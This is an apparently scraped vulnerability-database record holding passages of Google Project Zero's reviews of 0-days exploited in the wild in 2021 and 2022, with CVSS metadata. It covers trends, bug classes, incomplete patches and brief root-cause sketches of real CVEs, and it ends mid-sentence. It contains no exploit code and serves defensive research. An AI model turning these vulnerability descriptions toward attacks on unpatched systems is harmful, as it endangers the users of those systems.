\n\n[CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>)\n\n| \n\n[CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) (2021 itw) \n \niOS IOMobileFrameBuffer\n\n| \n\n[CVE-2022-22587](<https://support.apple.com/en-us/HT213053>)\n\n| \n\n[CVE-2021-30983](<https://googleprojectzero.blogspot.com/2022/06/curious-case-carrier-app.html>) (2021 itw) \n \nWindows\n\n| \n\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) (\u201cFollina\u201d)\n\n| \n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (2021 itw) \n \nChromium property access interceptors\n\n| \n\n[CVE-2022-1096](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>)\n\n| \n\n[CVE-2016-5128](<https://bugs.chromium.org/p/chromium/issues/detail?id=619166>) [CVE-2021-30551](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30551.html>) (2021 itw) [CVE-2022-1232](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2280>) (Addresses incomplete CVE-2022-1096 fix) \n \nChromium v8\n\n| \n\n[CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>)\n\n| \n\n[CVE-2021-21195](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_30.html>) \n \nWebKit\n\n| \n\n[CVE-2022-22620](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>) (\u201cZombie\u201d)\n\n| \n\n[Bug was originally fixed in 2013, patch was regressed in 2016](<https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html>) \n \nGoogle Pixel\n\n| \n\n[CVE-2021-39793](<https://source.android.com/security/bulletin/pixel/2022-03-01>)*\n\n* While this CVE says 2021, the bug was patched and disclosed in 2022\n\n| \n\n[Linux same bug in a different subsystem](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cd5297b0855f17c8b4e3ef1d20c6a3656209c7b3>) \n \nAtlassian Confluence\n\n| \n\n[CVE-2022-26134](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)\n\n| \n\n[CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) \n \nWindows\n\n| \n\n[CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) (\u201cPetitPotam\u201d)\n\n| \n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (Patch regressed) \n \nSo, what does this mean?\n\nWhen people think of 0-day exploits, they often think that these exploits are so technologically advanced that there\u2019s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we\u2019ve seen so far this year are closely related to bugs we\u2019ve seen before. Our conclusion and findings in the [2020 year-in-review report](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>) were very similar.\n\nMany of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn\u2019t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the [slides from the talk](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.\n\nThis is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report: \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. \n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nPractically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:\n\n * Root cause analysis\n\nUnderstanding the underlying vulnerability that is being exploited. Also tries to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix is addressing the underlying vulnerability and not just breaking the proof-of-concept. Root cause analysis is generally a pre-requisite for successful variant and patch analysis.\n\n * Variant analysis\n\nLooking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn\u2019t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply \u201cplug and play\u201d with a new vulnerability once the original is patched.\n\n * Patch analysis\n\nAnalyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor\u2019s own internal analysis.\n\n * Exploit technique analysis\n\nUnderstanding the primitive gained from the vulnerability and how it\u2019s being used. While it\u2019s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn\u2019t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.\n\nTransparently sharing these analyses helps the industry as a whole as well. We publish our analyses at [this repository](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>). We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-30T00:00:00", "type": "googleprojectzero", "title": "\n2022 0-day In-the-Wild Exploitation\u2026so far\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128", "CVE-2021-1732", "CVE-2021-21195", "CVE-2021-26084", "CVE-2021-30551", "CVE-2021-30983", "CVE-2021-36942", "CVE-2021-39793", "CVE-2021-40444", "CVE-2022-1096", "CVE-2022-1232", "CVE-2022-1364", "CVE-2022-21882", "CVE-2022-22587", "CVE-2022-22620", "CVE-2022-26134", "CVE-2022-26925", "CVE-2022-30190"], "modified": "2022-06-30T00:00:00", "id": "GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "href": "https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-25T01:57:30", "description": "A Year in Review of 0-days Used In-the-Wild in 2021\n\nPosted by Maddie Stone, Google Project Zero\n\nThis is our third annual year in review of 0-days exploited in-the-wild [[2020](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), [2019](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>)]. Each year we\u2019ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in the analysis of individual exploits, please check out our [root cause analysis repository](<https://googleprojectzero.blogspot.com/p/rca.html>).\n\nWe perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard [over](<https://forbiddenstories.org/about-the-pegasus-project/>) and [over](<https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/>) and [over](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>) about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans\u2019 lives.\n\nWe\u2019ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.\n\n# Executive Summary\n\n2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That\u2019s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We\u2019ve tracked publicly known in-the-wild 0-day exploits in [this spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) since mid-2014.\n\nWhile we often talk about the number of 0-day exploits used in-the-wild, what we\u2019re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.\n\nWith this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn\u2019t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero\u2019s mission is \u201cmake 0day hard\u201d. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous &amp; publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.\n\nSo while we recognize the industry\u2019s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there\u2019s a lot more improving to be done. Having access to more \u201cground truth\u201d of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.\n\nWe had so many more data points in 2021 to learn about attacker behavior than we\u2019ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they\u2019re using or what percentage of 0-days we\u2019re missing in our tracking, so we\u2019ll never know exactly what proportion of 0-days are currently being found and disclosed publicly. \n\nBased on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:\n\n 1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.\n 2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.\n\n# A Record Year for In-the-Wild 0-days\n\n2021 was a record year for in-the-wild 0-days. So what happened?\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC72HVhQEdwHNIzMiyb18bUFr6hPCWJiKL2Mm43-tW11qc0ucOPI8A9oChEXQe0-QNOBF83SIcfyjcyvPveuWvgipbiBzHWqZTx2-LilJFYIbx6uQeno9f481HJQ0CgylQkh8Ks7AbGC6tjhYDNBcI7jh6ihhzJATA0r_P4bQUBm-1lmHp2DPvWM6I/s1200/image1%287%29.png>)\n\nIs it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.\n\nWhile we often talk about \u201c0-day exploits used in-the-wild\u201d, what we\u2019re actually tracking are \u201c0-day exploits detected and disclosed as used in-the-wild\u201d. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry. \n\nOverall, we can break down the uptick in the number of in-the-wild 0-days into:\n\n * More detection of in-the-wild 0-day exploits\n * More public disclosure of in-the-wild 0-day exploitation\n\n## More detection\n\nIn the [2019 Year in Review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we wrote about the \u201cDetection Deficit\u201d. We stated \u201cAs a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\u201d In the last two years, we believe that there\u2019s been progress on this gap. \n\nAnecdotally, we hear from more people that they\u2019ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we\u2019re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbFpoEKSSn5AbAzsovaZ0yN6_OFXo9u4hpDCXJBpro8LRUWJlVQ9CSqtzT2V9ohrhOvP3_RnrYsOzFGPK0FZGJmW2713g2vVW82ReJVXpjAZc57BCxtHg8i-6AdR_ThDZB6UKvzAKekbmAkuUBliMyDyWSBW87z4ZZQJC3KX-_ptZIHveotLGoJ9I/s1200/image5%284%29.png>)\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRS0t_2Bwvc3U_EIr5h7NcWpQyjzHCPb4OMiDpzPxPs587otAEj8bzwch8UMFlgKchwdSq4L_PXRn1O6KGLHUl4X9voLBdZJNQsgQyJcMCVB4Y8-aRHaXRpOYZw7KVtyNYwdWpwX8ILUV1fyG2kDsXVWORsSPUBGVTON90gWf9POhhxA4edxNe1eoV/s1200/image2%285%29.png>)\n\nWe\u2019ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it\u2019s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!\n\n## More disclosure\n\nThe second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate \u201cGoogle Android\u201d rather than just \u201cGoogle\u201d because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don\u2019t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by \u201cAnonymous\u201d reporters. If the reporters didn\u2019t want credit for the vulnerability, it\u2019s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn\u2019t have been included in this year\u2019s list if Apple and Google Android had not begun transparently annotating their security advisories. \n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPe_J-0Wu9Ap-0n3Yj5BoXiWTnjViyyGasIChhb3juADZosK9nTbyiaWtzuRyjwG3frQNjLsvRMRoQHrFfo1iKa3GjmcuLHqat40GcoechQ16XbhpVGwF7m_TJ0Oucvy3wvm8x0aXbVnJfhkG2FNkxI4cJf5ONBqEYnPxQDUmZChvByLHE8OzSU20N/s1200/image3%287%29.png>)\n\nKudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for [CVE-2021-41773](<https://httpd.apache.org/security/vulnerabilities_24.html>) this past year. \n\nIn-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor\u2019s own security advisories.\n\nIt's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we\u2019re confident that all vendors are transparently disclosing in-the-wild status, there\u2019s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.\n\n# New Year, Old Techniques\n\nWe had a record number of \u201cdata points\u201d in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit \u201cshapes\u201d previously seen in public research. Once \u201c0-day is hard\u201d, we\u2019d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty \u201c[meh](<https://www.dictionary.com/browse/meh#:~:text=unimpressive%3B%20boring%3A>)\u201d or standard.\n\nOut of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it\u2019s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:\n\n * 17 use-after-free\n * 6 out-of-bounds read &amp; write\n * 4 buffer overflow\n * 4 integer overflow\n\nIn the next sections we\u2019ll dive into each major platform that we saw in-the-wild 0-days for this year. We\u2019ll share the trends and explain why what we saw was pretty unexceptional.\n\n## Chromium (Chrome)\n\nChromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.\n\nThe 14 0-day vulnerabilities were in the following components:\n\n * 6 JavaScript Engine - v8 ([CVE-2021-21148](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>), [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>), [CVE-2021-37975](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-37975.html>), [CVE-2021-38003](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>))\n * 2 DOM Engine - Blink ([CVE-2021-21193](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) &amp; [CVE-2021-21206](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>))\n * 1 WebGL ([CVE-2021-30554](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html>))\n * 1 IndexedDB ([CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>))\n * 1 webaudio ([CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>))\n * 1 Portals ([CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>))\n * 1 Android Intents ([CVE-2021-38000](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-38000.html>))\n * 1 Core ([CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>))\n\nWhen we look at the components targeted by these bugs, they\u2019re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.\n\nA couple of the Chromium bugs were even similar to previous in-the-wild 0-days. [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>) is an issue in ScriptProcessorNode::Process() in webaudio where there\u2019s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. [CVE-2019-13720](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-13720.html>) is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.\n\n[CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) is another Chromium in-the-wild 0-day from 2021. It\u2019s a type confusion in the TurboFan JIT in Chromium\u2019s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) in particular deals with code that stores global properties. [CVE-2020-16009](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-16009.html>) was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.\n\n## WebKit (Safari)\n\nPrior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don\u2019t have historical samples to go off of. Instead, we\u2019ll look at 2021\u2019s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days. \n\nThe 7 in-the-wild 0-days targeted the following components:\n\n * 4 Javascript Engine - JavaScript Core ([CVE-2021-1870](<https://support.apple.com/en-us/HT212146>), [CVE-2021-1871](<https://support.apple.com/en-us/HT212146>), [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>), [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>))\n * 1 IndexedDB ([CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>))\n * 1 Storage ([CVE-2021-30661](<https://support.apple.com/en-us/HT212317>))\n * 1 Plugins ([CVE-2021-1879](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1879.html>))\n\nThe one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021. \n\nIt would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there\u2019s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>), also existed in WebKit and was fixed as [CVE-2021-1844](<https://support.apple.com/en-us/HT212223>), though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, [CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>), was very, very similar to a [bug fixed in Chromium in January 2020](<https://bugs.chromium.org/p/chromium/issues/detail?id=1032890>).\n\n## Internet Explorer\n\nSince we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we\u2019ve ever tracked even though Internet Explorer\u2019s market share of web browser users continues to decrease.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbMTlnGhVLcVL8K20S3s6hSrpyB6kZAA9CWvWNpn1isbEbLFv0c2rs_dPvM0ALT45NtTvyhp8rGehGDRIAEJ6OZYSkk5mezOEoPJOquVXXyHeqrVOvRGEiQHv_J7Je8Itjc5qhwXMCR-E4y79abuxiddCYoeF2VrVakY-L1q82NeMEPjTA0fFC-t8h/s1200/image4%286%29.png>)\n\nSo why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn\u2019t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we\u2019ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats. \n\nThe four 0-days targeted the following components:\n\n * MSHTML browser engine ([CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html>), [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>))\n * Javascript Engine - JScript9 ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>))\n\nFor [CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) and [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) were delivered to targets via malicious Office documents.\n\n[CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) and [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.\n\nThere were a few different vulnerabilities used in the exploit chain that used [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.\n\n## Windows\n\nWindows is the platform where we\u2019ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it\u2019s still not especially novel.\n\nIn 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:\n\n * 2 Enhanced crypto provider ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>), [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>))\n * 2 NTOS kernel ([CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>), [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>))\n * 2 Win32k ([CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>), [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>))\n * 1 Windows update medic ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)) \n * 1 SuperFetch ([CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>))\n * 1 dwmcore.dll ([CVE-2021-28310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>))\n * 1 ntfs.sys ([CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>))\n\nThe number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.\n\nSimilar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn\u2019t check this and writes that field as a user-mode pointer without clearing 